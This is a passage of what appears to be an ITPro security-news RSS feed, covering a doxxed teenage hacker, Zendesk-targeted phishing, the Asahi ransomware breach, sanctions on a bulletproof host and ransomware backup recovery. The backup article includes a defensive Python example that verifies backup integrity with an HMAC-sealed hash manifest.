While operating under the Telegram username <em>@wristmug</em>, Rey accidentally revealed his password in a screenshot - a password that Krebs was able to link to the email address <em>cybero5tdev@proton.me</em>. </p><p>Data from SpyCloud then indicated that Rey’s computer was a shared Microsoft Windows device located in Amman, Jordan, and also used by other family members.</p><p>It's not clear what will happen now. But Alon Gal, co-founder and <a href="https://www.itpro.com/strategy/28237/cto-job-description-what-does-a-cto-do">CTO </a>at Hudson Rock, questioned why “no apparent action” had been taken by law enforcement. </p><p>“Rey is one of the most prolific threat actors of the past few years,” he wrote in a <a href="https://www.linkedin.com/feed/update/urn:li:activity:7399521191767564290/?originTrackingId=WRC4pjJDJ3JDywTf1jvdSQ%3D%3D" target="_blank"><u>post on LinkedIn</u></a>. “I genuinely don’t understand how they let him continue if the dox proves to be accurate."</p><p>In any case, Rey told Krebs: "I don’t really care, I just want to move on from all this stuff even if its going to be prison time or whatever they gonna say.” </p><h2 id="the-rise-of-teen-hackers">The rise of teen hackers</h2><p>It's not unusual for hackers - especially in the various groups associated with Scattered Spider - to turn out to be extremely young. In September, for example, 19-year-old Thalha Jubair and Owen Flowers, 18, were <a href="https://www.itpro.com/security/channel-their-curiosity-into-something-meaningful-cyber-expert-warns-an-uptick-of-youth-hackers-should-be-a-wake-up-call-after-teens-charged-over-tfl-attack"><u>charged</u></a> in the UK for their involvement in an attack on TfL last year.</p><p>Speaking to <em>ITPro </em>at the time, security experts said the uptick in youth-related cyber crime is a serious cause for concern and requires swift action from industry, academia, and law enforcement. 
</p><p>Anna Chung, principal researcher for EMEA at Palo Alto Networks, said the trend should be a “wake up call” for authorities and called for efforts to encourage tech-savvy teens toward legitimate careers in <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity</a>. </p><p>According to the UK's <a href="https://www.itpro.com/information-commissioner/31751/what-is-the-information-commissioner-s-office-ico">Information Commissioner’s Office (ICO)</a>, the biggest cybersecurity risk faced by schools <a href="https://www.itpro.com/security/kids-hacking-for-kicks-are-causing-security-headaches-at-schools"><u>comes from the pupils themselves</u></a>, with around 5% of all 14-year-old boys and girls admitting to ‘hacking’ in some capacity.</p><p>William Wright, CEO of Closed Door Security, said the group boasts close ties to Russian threat actors, which has enabled it to wreak widespread havoc. </p><p>"There will be a lot of concern among the general public around how a 15-year-old could cause so much damage to some of the biggest organisations in the UK. But in reality, it's not so simple. Rey was collaborating with Russian threat actors, using their infrastructure to execute highly sophisticated attacks," he said. </p><p>"Rey claims to be working with law enforcement now, which is causing trouble across the Scattered Lapsus$ Hunter Telegram channel. 
This could lead to other members of the gang being identified, but Rey may get off lightly if he supports law enforcement enough."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The Scattered Lapsus$ Hunters group is targeting Zendesk customers – here’s what you need to know ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/the-scattered-lapsus-usd-hunters-group-is-targeting-zendesk-customers-heres-what-you-need-to-know</link>
                                                                            <description>
                            <![CDATA[ The group appears to be infecting support and help-desk personnel with remote access trojans and other forms of malware ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">yA82eDy5m43beT5ptyrzhG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/KfsCD25eUDMdmZevdnb6rU-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 27 Nov 2025 11:45:15 +0000</pubDate>                                                                                                                                <updated>Thu, 27 Nov 2025 11:46:02 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/KfsCD25eUDMdmZevdnb6rU-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Zendesk logo and branding pictured on a smartphone screen. ]]></media:description>                                                            <media:text><![CDATA[Zendesk logo and branding pictured on a smartphone screen. ]]></media:text>
                                <media:title type="plain"><![CDATA[Zendesk logo and branding pictured on a smartphone screen. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/KfsCD25eUDMdmZevdnb6rU-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Scattered Lapsus$ Hunters threat group appears to be targeting <a href="https://www.itpro.com/business/marketing-and-comms/how-lush-aligned-its-disjointed-customer-support-operations">Zendesk </a>users in a new <a href="https://www.itpro.com/security/29093/what-is-phishing">phishing </a>campaign, according to analysis from ReliaQuest.</p><p>The security firm <a href="https://reliaquest.com/blog/zendesk-scattered-lapsus-hunters-latest-target/" target="_blank"><u>said</u></a> it has spotted Zendesk-related infrastructure, including more than 40 typosquatted domains and URLs impersonating the company, created over the last six months. </p><p>These domains aim to mimic organizations’ Zendesk environments and host phishing pages, researchers warned. </p><p>"These domains, such as znedesk[.]com or vpn-zendesk[.]com, are clearly designed to mimic legitimate Zendesk environments. Some host phishing pages, like fake <a href="https://www.itpro.com/security/single-sign-on-sso/361728/what-is-single-sign-on-sso">single sign-on (SSO)</a> portals that appear before Zendesk authentication," said ReliaQuest. </p><p>"It’s a classic tactic probably aimed at stealing credentials from unsuspecting users. We also identified Zendesk-related impersonating domains that contained multiple different organizations’ names or brands within the URL, making it even more likely that unsuspecting users would trust and click on these links."</p><p>The domains shared several registry details: registration through NiceNic, US and UK registrant contact information, and Cloudflare-masked nameservers. </p><p>"These elements are reminiscent of the recent Scattered Lapsus$ Hunters campaign that targeted customer relationship management platform Salesforce in August 2025," ReliaQuest said. 
</p><p>"The domains we uncovered while investigating the August campaign shared similarities with the Zendesk domains: formatting, registry characteristics, and the use of deceptive SSO portals." </p><h2 id="be-wary-of-fraudulent-zendesk-tickets">Be wary of fraudulent Zendesk tickets</h2><p>Meanwhile, ReliaQuest said it has observed fraudulent tickets being submitted to legitimate Zendesk portals operated by organizations using the software for customer service. </p><p>Pretexts include urgent system administration requests or fake password reset inquiries, and the aim is to infect support and help-desk personnel with <a href="https://www.itpro.com/security/30081/what-is-a-trojan-virus">remote access trojans (RATs)</a> and other forms of <a href="https://www.itpro.com/malware/28076/what-is-malware">malware</a>.</p><p>In September, Scattered Lapsus$ Hunters targeted the communication platform Discord, accessing its Zendesk-based support system and exfiltrating a large number of names, email addresses, billing information, IP addresses, and government-issued IDs.</p><p>A message posted on a Telegram channel associated with the group in November claimed: "Wait for 2026, we are running 3-4 campaigns atm." </p><p>Another read: "all the IR (incident response) people should be at work watching their logs during the upcoming holidays till January 2026 bcuz #ShinyHuntazz is coming to collect your customer databases."</p><p>ReliaQuest said organizations should handle customer support platforms with the same level of security as their own core infrastructure.  </p><p>"ReliaQuest anticipates that SLSH, or copycat threat actors, will likely continue abusing Zendesk and similar customer support platforms — typically monitored less rigorously than inbound email traffic — to access downstream customers' sensitive data and credentials," said the firm. 
</p><p>"These platforms now warrant equivalent security controls to core infrastructure, particularly since SLSH operates multiple, concurrent attack paths, i.e. external phishing domains coupled with internal ticket injection."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Impact of Asahi cyber attack laid bare as company confirms 1.5 million customers exposed ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/impact-of-asahi-cyber-attack-laid-bare-as-company-confirms-1-5-million-customers-exposed</link>
                                                                            <description>
                            <![CDATA[ No ransom has been paid, said president and group CEO Atsushi Katsuki, and the company is restoring its systems ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">XcX6ActjP2bh9LDh65xnZR</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/aDBAN7h4XVnMEMPqko7mef-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 27 Nov 2025 10:50:40 +0000</pubDate>                                                                                                                                <updated>Thu, 27 Nov 2025 15:00:21 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/aDBAN7h4XVnMEMPqko7mef-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Asahi logo pictured outside the Asahi Kanagawa Brewery in Minamiashigara, Kanagawa, Japan.]]></media:description>                                                            <media:text><![CDATA[Asahi logo pictured outside the Asahi Kanagawa Brewery in Minamiashigara, Kanagawa, Japan.]]></media:text>
                                <media:title type="plain"><![CDATA[Asahi logo pictured outside the Asahi Kanagawa Brewery in Minamiashigara, Kanagawa, Japan.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/aDBAN7h4XVnMEMPqko7mef-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Japanese brewing giant Asahi has revealed that a <a href="https://www.itpro.com/security/asahi-production-halted-by-cyber-attack">cyber attack in September</a> saw personal information belonging to 1.5 million customers exposed. </p><p>The incident, discovered on 29 September, saw an attacker <a href="https://www.itpro.com/security/japan-running-super-dry-of-its-favourite-beer-as-asahi-cyberattack-continues">gain unauthorized access to the firm's data center network</a> via network equipment at its headquarters. </p><p>"<a href="https://www.itpro.com/security/28084/what-is-ransomware">Ransomware </a>was deployed simultaneously, encrypting data on multiple active servers and some PC devices connected to the network," said Asahi in an <a href="https://www.asahigroup-holdings.com/en/newsroom/detail/20251127-0204.html" target="_blank"><u>update</u></a>.</p><p>"While investigating the extent and details of the impact, focusing on the systems targeted in the attack, we identified that some data from company-issued PCs provided to employees had been exposed."</p><p>The company said there was no evidence that the data had been published on the internet, and that the attack was limited to systems managed in Japan.</p><p>Customers affected in the incident are those who had contacted the customer service centers of Asahi Breweries, Asahi Soft Drinks, and Asahi Group Foods, with names, gender, addresses, phone numbers, and email addresses exposed.</p><p>Meanwhile, the names, addresses and phone numbers of external contacts to whom the company had sent congratulatory or condolence telegrams were accessed.  
</p><p>Employee details were also exposed in the breach, Asahi confirmed, with information including names, dates of birth, addresses, phone numbers, and email addresses impacted along with the names, dates of birth, and gender of some family members.</p><h2 id="asahi-cyber-attack-recovery-still-ongoing">Asahi cyber attack recovery still ongoing</h2><p>The company said it continues to restore systems on a phased basis, is redesigning communication routes and network controls, and tightening connection restrictions.</p><p>It's also limiting connections to external parties via the internet – including email and web applications – to secure zones and improving security monitoring systems.</p><p><a href="https://www.itpro.com/business/business-strategy/data-backup-strategies-in-focus-as-800000-uk-firms-admit-to-losing-data-since-2019">Backup strategies</a> and BCP plans will be redesigned and updated to ensure rapid recovery in the event of an emergency, the firm said, while security standards will be continuously reviewed.</p><p>“I would like to sincerely apologize for any difficulties caused to our stakeholders by the recent system disruption. We are making every effort to achieve full system restoration as quickly as possible, while implementing measures to prevent recurrence and strengthening information security across the group,” said Atsushi Katsuki, president and group CEO.</p><p>“Regarding product supply, shipments are resuming in stages as system recovery progresses. We apologize for the continued inconvenience and appreciate your understanding.”</p><h2 id="who-was-behind-the-attack">Who was behind the attack?</h2><p>At a press conference in Tokyo this week, Katsuki said the company hadn't communicated with the attacker and hadn't paid any ransom. 
</p><p>"Even if we had a ransom demand, we would not have paid it," he said.</p><p>The attack has been claimed by the <a href="https://www.itpro.com/security/rocketing-number-of-ransomware-groups-as-new-smaller-players-emerge">Qilin ransomware group</a>, which has listed Asahi on its data leak site. </p><p>The group claims it exfiltrated 27GB of files from the company, including financial documents, budgets and contracts, along with the personal data of employees, as well as plans and development forecasts of the company. </p><p>In a recent <a href="https://www.guidepointsecurity.com/resources/grit-q3-2025-ransomware-and-cyber-threat-report/?utm_source=press%20release&utm_medium=website&utm_campaign=2025_10_09_corp_grit_q3_ransomware_report&utm_vendor=gps" target="_blank"><u>report</u></a>, Guidepoint said the Russia-linked group was now the world's leading ransomware gang, with its activity surging 318% year-over-year during the last quarter, and claiming 234 victims.</p><p>The group has claimed responsibility for attacks on manufacturers, financial firms, retailers, government and healthcare providers, including <a href="https://www.itpro.com/security/cyber-attacks/thousands-of-procedures-canceled-at-london-hospitals-as-qilin-releases-blood-test-data"><u>London hospitals</u></a>.</p><p>“The Asahi ransomware attack is a powerful reminder that the fallout from a cyber breach can stretch far beyond the initial incident," said Chris Dimitriadis, chief global strategy officer at ISACA. </p><p>"Months later, it’s been revealed that 1.5 million customers potentially had their data breached, and the company has been forced to delay its financial results. This is clear evidence that the damage from ransomware attacks can be deep, expensive and long-lasting." </p><p>Dimitriadis added: “While we’ve seen more of these large-scale attacks in 2025, we cannot afford to become desensitised to them. 
With AI now enabling criminals to hack at the speed of intent, the job of defending against attacks is even more critical. The window to detect and stop an attack is shrinking."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The US, UK, and Australia just imposed sanctions on a Russian cyber crime group – 'we are exposing their dark networks and going after those responsible' ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-crime/the-us-uk-and-australia-just-imposed-sanctions-on-a-russian-cyber-crime-group-we-are-exposing-their-dark-networks-and-going-after-those-responsible</link>
                                                                            <description>
                            <![CDATA[ Media Land offers 'bulletproof' hosting services used for ransomware and DDoS attacks around the world ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">jbcE8oNisiHJvQRxooNzLU</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/Aqeo3GHF5pnDS754K9ahY5-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 20 Nov 2025 10:55:00 +0000</pubDate>                                                                                                                                <updated>Fri, 21 Nov 2025 08:31:54 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Crime]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/Aqeo3GHF5pnDS754K9ahY5-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Russian cyber crime concept image showing Russian national flag with padlock symbol in background with smashed glass in foreground.]]></media:description>                                                            <media:text><![CDATA[Russian cyber crime concept image showing Russian national flag with padlock symbol in background with smashed glass in foreground.]]></media:text>
                                <media:title type="plain"><![CDATA[Russian cyber crime concept image showing Russian national flag with padlock symbol in background with smashed glass in foreground.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/Aqeo3GHF5pnDS754K9ahY5-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The UK, US, and Australia have imposed sanctions on a Russian cyber crime group offering so-called 'bulletproof' <a href="https://www.itpro.com/network-internet/web-hosting/368170/best-web-hosting-services-in-2022">hosting services</a> for hackers worldwide. </p><p>Media Land provides online infrastructure to support <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a> and <a href="https://www.itpro.com/security/29093/what-is-phishing">phishing </a>operations, and is believed to have played a key role in a spate of devastating cyber attacks in recent years. </p><p>Ransomware victims of the outfit include UK <a href="https://www.itpro.com/security/cyber-attacks/why-attacks-against-critical-national-infrastructure-cni-are-such-a-threat">critical national infrastructure</a> organizations and it's also been used for <a href="https://www.itpro.com/malware/28076/what-is-malware">malware </a>and phishing campaigns targeting UK taxpayers.</p><p>In the US, Media Land infrastructure has been used in <a href="https://www.itpro.com/security/28026/what-is-a-ddos-attack">distributed denial of service (DDoS)</a> attacks against companies and critical infrastructure. Meanwhile, in Australia, the group has helped criminals to carry out attacks against financial institutions, businesses, their customers, and critical infrastructure. 
</p><p>"Cyber criminals think that they can act in the shadows, targeting hard working British people and ruining livelihoods with impunity," said UK foreign secretary Yvette Cooper.</p><p>"But they are mistaken – together with our allies, we are exposing their dark networks and going after those responsible."</p><p>The measures target Media Land’s ringleader, Alexander Volosovik, also known as Yalishanda, who has been active since at least 2010 and is known to have worked with some of the most notorious cyber criminal groups, including Evil Corp, <a href="https://www.itpro.com/security/ransomware/lockbit-remains-most-dangerous-ransomware-despite-fall-in-attacks">LockBit</a>, and <a href="https://www.itpro.com/security/ransomware/royal-hive-black-basta-ransomware-gangs-collaborating-on-cyber-attacks">Black Basta</a>. </p><p>Also sanctioned is Kirill Zatolokin, a Media Land employee responsible for collecting payment from customers and coordinating with other cyber actors, as well as Yulia Pankova, who has helped Volosovik with legal issues and handled his finances.</p><h2 id="sanctions-target-media-land-sister-outfits">Sanctions target Media Land sister outfits</h2><p>The sanctions also target ML Cloud, a Media Land sister company whose technical infrastructure is often used in conjunction with Media Land, including in ransomware and <a href="https://www.itpro.com/security/cyber-attacks/cyber-experts-have-been-warning-about-ai-powered-ddos-attacks-now-theyre-becoming-a-reality">DDoS attacks</a>.</p><p>Hypercore, a UK company registered and utilized by Aeza Group, has also been targeted in the international campaign. </p><p>The sanctions block access to any assets held in the sanctioning countries, and bar businesses and individuals there from engaging with the listed entities or people. 
Financial institutions that violate these restrictions can face penalties themselves.</p><p>"These sanctions don’t just impose costs on criminals, they dismantle the infrastructure that enables cyber crime," said Australian deputy prime minister Richard Marles. </p><p>"By disrupting these networks, we make it harder for others to launch attacks and it strengthens Australia’s resilience against future threats."</p><h2 id="will-the-sanctions-work">Will the sanctions work?</h2><p>The move marks the latest in a string of actions by governments to crack down on cyber crime-related hosting services. </p><p>In July this year, the US Treasury <a href="https://www.itpro.com/security/ransomware/aeza-group-ransomware-hosting-us-sanctions">announced plans to impose sanctions on Aeza Group</a>, another bulletproof hosting service, over its activities. US officials revealed the group has been selling access to specialized services and infrastructure used in a series of ransomware and infostealer malware campaigns. </p><p>While this fresh crackdown has been welcomed by security industry stakeholders, John Binns, partner and head of the sanctions practice at BCL Solicitors, said these typically have a limited effect. 
</p><p>"The evidential threshold for designation under the regulations is significantly lower than any in the criminal process, and the real-world impact on sophisticated actors operating primarily in hostile jurisdictions can be modest," he said.</p><p>"While sanctions are undoubtedly a valuable addition to the law-enforcement toolkit against transnational cyber crime, they deliver a form of administrative rather than criminal justice and are best viewed as potentially complementing - rather than supplanting - efforts to secure arrests, prosecutions, and asset forfeiture through the courts."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ How the channel weakened ransomware’s grip ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/how-the-channel-weakened-ransomwares-grip</link>
                                                                            <description>
                            <![CDATA[ What tools and techniques are empowering businesses to say no to ransomware demands? ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">aR9V72zDf6FWC2WqbHqAEg</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/2rdWoqNdk32nyzW9Qqq4GN-1280-80.jpeg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 06 Nov 2025 08:00:00 +0000</pubDate>                                                                                                                                <updated>Mon, 10 Nov 2025 12:38:16 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ James Watts ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/pczmoG9R5gEdBJjphBGxT3.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/2rdWoqNdk32nyzW9Qqq4GN-1280-80.jpeg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Circuit board with word ransomware lit up in neon red]]></media:description>                                                            <media:text><![CDATA[Circuit board with word ransomware lit up in neon red]]></media:text>
                                <media:title type="plain"><![CDATA[Circuit board with word ransomware lit up in neon red]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/2rdWoqNdk32nyzW9Qqq4GN-1280-80.jpeg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>More businesses than ever are now reporting that they’re choosing to recover from backups rather than cede to ransomware demands. In fact, recent Databarracks research found that just 17% of UK businesses paid the ransom in the past year.</p><p>The changes in response and recovery are in part down to better backup practices. Managed Service Providers (MSPs), IT partners, and resellers have all played a crucial role in supporting businesses beyond the compliance checkboxes and anti-virus software of the past.</p><p>Businesses are now drawing on channel partners’ expertise to implement resilience strategies that include air-gapped and immutable backups, together with regular testing, planning, and rehearsal. All of this is giving businesses the confidence to say no to ransom demands.</p><h2 id="air-gapped-immutable-backups">Air-gapped, immutable backups</h2><p>The best exit route for organizations facing ransomware is to be in a position where they can <em>choose</em> not to pay. To do that, they first need an air-gapped, immutable backup that an attacker inside the production environment can neither reach nor alter.</p><p>There are now several ways to create an air gap, and several ways to introduce ‘immutability’ that balance access against storage and cost. The channel can play a crucial part in supporting businesses with this step: advising on the best method, solution, and supporting technology for a business’s particular needs, then handling the implementation too.</p><p>One of the added benefits of outsourcing backups to a managed service provider is that you introduce another level of separation between production data and backups. Our recommendation from a continuity perspective would be to adopt a multi-vendor approach wherever possible: for example, one supplier delivering production IT and another looking after IT resilience.</p><p>Implementing immutable storage is often touted as a silver bullet, but channel partners need to explain to their customers that it also commits them to holding more storage, because locked copies cannot be pruned until their retention period expires. There’s no blanket policy or simple answer for every organization; any decision needs to balance cost and risk.</p><p>Having all of this in place isn’t enough on its own, either; businesses also have to <em>want</em> to refuse the ransom. In rare cases, the ransom will even cost less than carrying out your own recovery.</p><h2 id="prepared-rehearsed-and-resilient">Prepared, rehearsed, and resilient</h2><p>The right channel partner can support more than the implementation of new techniques and technologies. They also play a role in keeping cybersecurity policies and incident response plans up to date and can ensure that businesses are aware of any new requirements.</p><p>Crucially, they ensure teams are trained to recognize and report incidents promptly. While most organizations already deliver cybersecurity awareness training, a necessary baseline, not all pair it, as they should, with incident response exercises.</p><p>Channel partner support with recovery planning and rehearsal is integral to instilling confidence for when disaster strikes. It’s always advisable to conduct regular cyber crisis management exercises to test plans and ensure preparedness.</p><h2 id="regulation-plays-its-part">Regulation plays its part</h2><p>The shift in ransomware response is also in part due to new regulation. The UK Government confirmed its new ransomware policy in July, which includes a ban on ransom payments by public sector bodies and critical national infrastructure operators, plus mandatory reporting and pre-payment notification for the private sector.</p><p>While this is bold, the data shows the direction of travel was already clear. In one sense, the policy is a formalization of where UK businesses were already headed. Paying the ransom used to feel like the only option. Now, the best-prepared organizations are recovering faster, more reliably, and without funding criminals.</p><p>Overall, the balance is shifting. Despite these changes, the best antidote to ransomware – beyond any regulatory directives – remains preparedness.</p><h2 id="the-road-ahead">The road ahead</h2><p>The channel is empowering more organizations to make that choice, and to take a meaningful step towards strengthening the UK’s cyber resilience and breaking the cycle of ransomware attacks.</p><p>Recovery isn’t a last resort; it’s a strategy. The organizations that plan and rehearse their recoveries are the ones that come through an attack strongest. That’s how you beat ransomware: not by paying, but by preparing to recover.</p>
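<p>As an added illustration for the backup sections above (example code written for this page, not Databarracks’ or any vendor’s tooling), the following Python shows the check a recovery rehearsal should run before a backup set is trusted: a SHA-256 manifest recorded when the backup is taken, sealed with an HMAC key that does not live on the backup host, and compared against the live files. The sample files, the simulated ransomware tampering and the key are all constructed for the demo; it assumes the backup set is plain files under one directory and that the manifest and its tag are kept on the air-gapped or immutable side.</p>

```python
"""Backup integrity check for a recovery-first ransomware stance.

Added example for this article, not Databarracks' or any vendor's tooling.
The files, the simulated attack and the key in demo() are constructed.
Assumption: the backup set is plain files under one directory, and the
manifest plus its HMAC tag are stored off the backup host (air-gapped or
immutable side), so an attacker who encrypts the set cannot also rewrite them.
"""
import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative path -> digest and size for every file in the backup set."""
    return {
        p.relative_to(root).as_posix(): {"sha256": sha256_file(p), "size": p.stat().st_size}
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def seal(manifest: dict, key: bytes) -> str:
    """HMAC-SHA256 over the canonical manifest, so the manifest itself is tamper-evident."""
    body = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def verify_backup(root: Path, manifest: dict, tag: str, key: bytes) -> dict:
    """Check the manifest seal first, then compare the live backup set against it."""
    if not hmac.compare_digest(tag, seal(manifest, key)):
        return {"ok": False, "reason": "manifest seal invalid",
                "modified": [], "missing": [], "unexpected": []}
    current = build_manifest(root)
    modified = sorted(k for k in manifest if k in current and current[k]["sha256"] != manifest[k]["sha256"])
    missing = sorted(k for k in manifest if k not in current)
    unexpected = sorted(k for k in current if k not in manifest)
    ok = not (modified or missing or unexpected)
    return {"ok": ok, "reason": "" if ok else "backup set differs from manifest",
            "modified": modified, "missing": missing, "unexpected": unexpected}


def demo() -> dict:
    """Constructed scenario: a good backup, then ransomware overwrites a file and drops a note."""
    key = os.urandom(32)  # held off-host in practice; generated here only for the demo
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "db").mkdir()
        (root / "db" / "customers.sql").write_bytes(b"INSERT INTO customers VALUES (1, 'Acme');\n")
        (root / "config.yaml").write_bytes(b"retention_days: 30\n")
        manifest = build_manifest(root)
        tag = seal(manifest, key)
        clean = verify_backup(root, manifest, tag, key)

        (root / "db" / "customers.sql").write_bytes(os.urandom(64))  # 'encrypted' in place
        (root / "README_DECRYPT.txt").write_bytes(b"pay us\n")      # ransom note
        tampered = verify_backup(root, manifest, tag, key)

        # An attacker who can also rewrite the manifest is caught by the seal instead.
        forged = dict(manifest)
        forged["db/customers.sql"] = {"sha256": sha256_file(root / "db" / "customers.sql"), "size": 64}
        forged_result = verify_backup(root, forged, tag, key)
    return {"clean": clean, "tampered": tampered, "forged_manifest": forged_result}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

<p>The point of the seal is the separation the article argues for: a manifest stored beside the backups is only as trustworthy as the backups themselves, whereas a manifest and key held on the immutable side let the rehearsal distinguish an intact set from one that was silently encrypted or had its manifest rewritten.</p>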
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ A notorious ransomware group is spreading fake Microsoft Teams ads to snare victims ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/a-notorious-ransomware-group-is-spreading-fake-microsoft-teams-ads-to-snare-victims</link>
                                                                            <description>
                            <![CDATA[ The Rhysida ransomware group is leveraging Trusted Signing from Microsoft to lend plausibility to its activities ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">ypMyi8ZbGGmjf5agPHZQnD</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/G9Dv79E7SBGG2hp8n8G7Dc-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 04 Nov 2025 16:30:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/G9Dv79E7SBGG2hp8n8G7Dc-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Microsoft Teams app for macOS pictured on a MacBook device screen.]]></media:description>                                                            <media:text><![CDATA[Microsoft Teams app for macOS pictured on a MacBook device screen.]]></media:text>
                                <media:title type="plain"><![CDATA[Microsoft Teams app for macOS pictured on a MacBook device screen.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/G9Dv79E7SBGG2hp8n8G7Dc-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
